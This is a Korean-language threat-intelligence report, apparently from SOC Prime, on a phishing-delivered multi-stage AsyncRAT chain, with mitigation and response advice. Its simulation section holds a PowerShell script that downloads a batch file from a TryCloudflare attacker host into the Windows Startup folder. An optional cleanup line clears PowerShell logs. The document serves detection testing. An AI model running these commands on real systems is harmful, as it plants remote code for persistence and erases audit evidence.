SOC Prime Bias: 심각

14 Jan 2026 15:04 UTC

MDR이 다단계 AsyncRAT 공격 체인을 발견한 방법

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon 팔로우
MDR이 다단계 AsyncRAT 공격 체인을 발견한 방법
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

이 보고서는 피싱 이메일을 통해 시작되는 다단계 침입 체인을 설명합니다. 이는 이중 확장자 ZIP 유인을 전달하고 WebDAV로 호스팅된 페이로드 시퀀스로 전환됩니다. 운영자는 Cloudflare 무료 티어 인프라와 번들된 Python 구성 요소를 악용하여 피해자 엔드포인트에 AsyncRAT를 배포합니다. 실행 및 지속성은 Windows 스크립트 호스트, PowerShell, 배치 스크립트 등 기본 Windows 도구에 의존하며, 최종 단계에서는 코드 주입을 통해 explorer.exe에 침투합니다. 전달 및 스테이징을 신뢰받는 클라우드 서비스로 라우팅함으로써, 이 활동은 정상적인 트래픽에 섞여 일반적인 경계 통제를 회피할 수 있습니다.

조사

Trend Micro 조사관은 드롭박스에서 .pdf.zip 아카이브를 가져오고, 포함된 .url 바로가기를 실행하며, 그에 따른 WebDAV 상호작용이 svchost.exe 및 rundll32.exe에 기인한다고 보고했습니다. 이 체인은 Python 3.14.0 포함 파일을 배포하여 AsyncRAT 셸코드의 APC 주입을 담당하는 사용자 정의 Python 스크립트를 실행했습니다. 지속성은 사용자 시작 폴더에 배치 파일을 놓아 달성되었습니다. 분석가는 또한 TryCloudflare 호스트 여러 개가 인프라를 지원하고 있음을 식별하고 상관관계를 도출하였습니다.

완화 대책

사용자에게 이중 확장자 아카이브와 예상치 못한 ZIP 첨부 파일을 의심하도록 교육하고 피싱으로 전달된 클라우드 링크에 대한 필터링을 강화하여 노출을 줄이세요. 비허가된 클라우드 터널링 서비스에 대한 접근을 차단하거나 엄격히 통제하고, WebDAV에 대한 비정상적인 의존이 드문 환경에서 이를 모니터링하세요. 사용자 쓰기가 가능한 디렉터리의 스크립트 실행을 제한하고, 시작 폴더 사용과 예약된 작업 생성에 대한 통제를 강화하세요. 정상적인 프로세스를 목표로 하는 스크립트 구동 실행 체인 및 코드 주입 기술을 나타낼 수 있는 EDR/행동 감지에 우선순위를 두세요.

대응

활동이 감지되면 엔드포인트를 격리하고 체인과 관련된 의심스러운 프로세스(특히 사건과 연관된 svchost.exe, rundll32.exe, python.exe)를 중지하세요. 시작 디렉터리에서 악성 배치 아티팩트를 삭제하여 지속성을 제거하고, 다운로드된 Python 아카이브 및 모든 AsyncRAT 구성 요소를 제거하며, 추가 스테이징 파일 및 횡 이동을 위한 전체 포렌식 검사를 수행하세요. 네트워크 통제 및 차단 목록을 업데이트하여 식별된 TryCloudflare 도메인 및 조사가 수행되는 동안 관찰된 모든 관련 인프라를 포함하세요.

공격 흐름

시뮬레이션 실행

전제조건: 원격 측정 및 기준선 예비 비행 점검이 통과해야 합니다.

  • 공격 내러티브 & 명령

    초기 PowerShell 접근 권한을 획득한 공격자는 손상된 Windows 호스트에 Python 실행 환경을 설정하고 지속성을 달성하고자 합니다. 그들은:

    1. 임베디드 Python 배포판을 다운로드합니다. 사용자의 로컬 Temp 디렉토리에 직접 사용하여 Invoke‑WebRequest.
    2. 악성 배치 스크립트를 다운로드합니다. (ahke.bat) Cloudflare로 프록시 서버로 사용되는 도메인에서 사용자의 시작 폴더로 모든 로그온 시에 실행되도록 합니다.
    3. 다운로드된 Python zip을 실행합니다. (간결성을 위해 여기서 생략) 추가 페이로드를 실행하기 위해.

    이러한 단계는 Sigma 규칙과 일치하는 정확한 명령 문자열을 생성하여 iwr … -OutFile … 패턴을 사용한 PowerShell 스크립트 블록 로그를 생성합니다. iwr … -OutFile … 패턴.

  • 회귀 테스트 스크립트

    # -------------------------------------------------
    # AsyncRAT 환경 설정의 PowerShell 시뮬레이션
    # -------------------------------------------------
    
    # 1. 사용자 임시 폴더에 Python 임베디드 zip를 다운로드
    $pythonUrl = 'https://www.python.org/ftp/python/3.14.0/python-3.14.0-embed-amd64.zip'
    $pythonDest = "$env:USERPROFILEAppDataLocalTempp.zip"
    iwr $pythonUrl -OutFile $pythonDest
    
    # 2. 시작 폴더에 지속성을 위한 악성 배치 파일을 다운로드
    $batUrl = 'https://plus-condos-thy-redeem.trycloudflare.com/ahke.bat'
    $batDest = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat"
    iwr $batUrl -OutFile $batDest
    
    # 3. (선택 사항) 지속성 시범을 위한 배치 실행 트리거
    # Start-Process -FilePath $batDest -WindowStyle Hidden
    # -------------------------------------------------
  • 정리 명령

    # 다운로드된 아티팩트 제거
    Remove-Item -Path "$env:USERPROFILEAppDataLocalTempp.zip" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat" -ErrorAction SilentlyContinue
    
    # 선택적으로 PowerShell 스크립트 블록 로그 지우기 (관리자 권한 필요)
    # Clear-EventLog -LogName "Microsoft-Windows-PowerShell/Operational"